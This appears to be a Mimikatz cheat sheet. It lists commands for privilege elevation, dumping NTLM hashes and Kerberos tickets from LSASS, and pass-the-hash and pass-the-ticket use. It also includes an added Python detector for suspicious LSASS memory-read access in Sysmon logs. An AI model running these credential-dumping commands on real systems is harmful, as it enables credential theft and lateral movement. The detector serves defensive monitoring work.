Mimikatz is a tool for dumping and using cached credentials on a compromised machine. High-integrity or SYSTEM privileges are required for most commands.
Usage
Acquiring Privilege
privilege::debug  (try to enable SeDebugPrivilege; needed for elevation)
token::elevate  (try to elevate from high integrity to SYSTEM, if not already)
Dumping Credentials
lsadump::sam  (dump cached NTLM hashes from LSASS; local users only)
lsadump::lsa [ /patch | /inject ]  (dump LSA hashes; use /patch on a workstation to dump NT hashes and /inject on a DC to dump additional keys; "patch" refers to memory patching, see this article)
sekurlsa::logonpasswords  (dump all logged-on users' password hashes, including remote users')
- If LSASS Protection is enabled, install the mimidrv.sys file as a service.
sekurlsa::msv  (dump local and domain users' cached hashes)
kerberos::list /export  (dump Kerberos tickets)
sekurlsa::tickets /export  (dump cached tickets; in the output, "TGT" means ticket-granting ticket and "TGS" means a service ticket issued by the ticket-granting service)
sekurlsa::ekeys  (dump cached encryption keys for Kerberos authentication; debug privilege required)
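Every command in this section reads credential material out of the LSASS process, which on a monitored host leaves a process-access record. The following detector is an added example for this page, not part of Mimikatz or its documentation: it parses constructed Sysmon Event ID 10 (ProcessAccess) records flattened to one key=value line each and flags any non-allowlisted process that opens lsass.exe with PROCESS_VM_READ, the right needed to read another process's memory. The field names (SourceImage, TargetImage, GrantedAccess) follow Sysmon's schema; the paths and the allowlist are assumptions to be tuned per environment. Keying on the VM_READ bit rather than on specific masks such as 0x1010 is a deliberate generalization, so it also catches tools that request a different combination of rights.

```python
"""Flag processes that open lsass.exe with memory-read access.

Added example; not Mimikatz code. Input is constructed Sysmon Event ID 10
telemetry rendered as key=value lines. Allowlist and paths are assumptions.
"""
import re

# Process access rights from winnt.h. Reading credential material out of
# LSASS needs at least PROCESS_VM_READ on the target process.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Hypothetical allowlist of legitimate LSASS readers (lowercase full paths).
# Tune this for your own estate; it is an assumption, not a recommendation.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    "EventID=10 SourceImage=C:\\Windows\\System32\\csrss.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1fffff",
    "EventID=10 SourceImage=C:\\Users\\alice\\Downloads\\tool.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1010",
    "EventID=10 SourceImage=C:\\Windows\\System32\\taskmgr.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000",
    "EventID=10 SourceImage=C:\\Windows\\explorer.exe "
    "TargetImage=C:\\Windows\\System32\\notepad.exe GrantedAccess=0x1410",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one key=value line into a dict (values contain no spaces)."""
    return dict(FIELD_RE.findall(line))


def describe_access(mask):
    """Name the access rights in a GrantedAccess mask that matter here."""
    names = []
    if mask & PROCESS_VM_READ:
        names.append("PROCESS_VM_READ")
    if mask & PROCESS_QUERY_INFORMATION:
        names.append("PROCESS_QUERY_INFORMATION")
    if mask & PROCESS_QUERY_LIMITED_INFORMATION:
        names.append("PROCESS_QUERY_LIMITED_INFORMATION")
    return names


def is_suspicious_lsass_access(event):
    """True when a non-allowlisted process opens lsass.exe with VM_READ."""
    if event.get("EventID") != "10":
        return False
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    if event.get("SourceImage", "").lower() in ALLOWLIST:
        return False
    mask = int(event.get("GrantedAccess", "0x0"), 16)
    return bool(mask & PROCESS_VM_READ)


def find_suspicious(lines):
    """Return the SourceImage of every record that trips the rule."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_suspicious_lsass_access(event):
            hits.append(event["SourceImage"])
    return hits


if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        event = parse_event(line)
        if is_suspicious_lsass_access(event):
            rights = describe_access(int(event["GrantedAccess"], 16))
            print(f"LSASS read by {event['SourceImage']}: {', '.join(rights)}")
```

On the constructed sample only tool.exe is reported: csrss.exe is allowlisted, taskmgr.exe requested only PROCESS_QUERY_LIMITED_INFORMATION, and the explorer.exe record targets a different process.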
Using Credentials
sekurlsa::pth  (pass-the-hash)
- Format: sekurlsa::pth /user:DOMAIN_USER /domain:DOMAIN /ntlm:NTLM_HASH /run:COMMAND
- Run with unelevated privileges (use token::revert first); pass-the-hash with an elevated token does not work.
kerberos::ptt  (pass-the-ticket)
- Format: kerberos::ptt TICKET.kirbi  (inject ticket into memory; elevated privilege not necessary)
Miscellaneous
kerberos::purge  (remove all Kerberos tickets from the current session)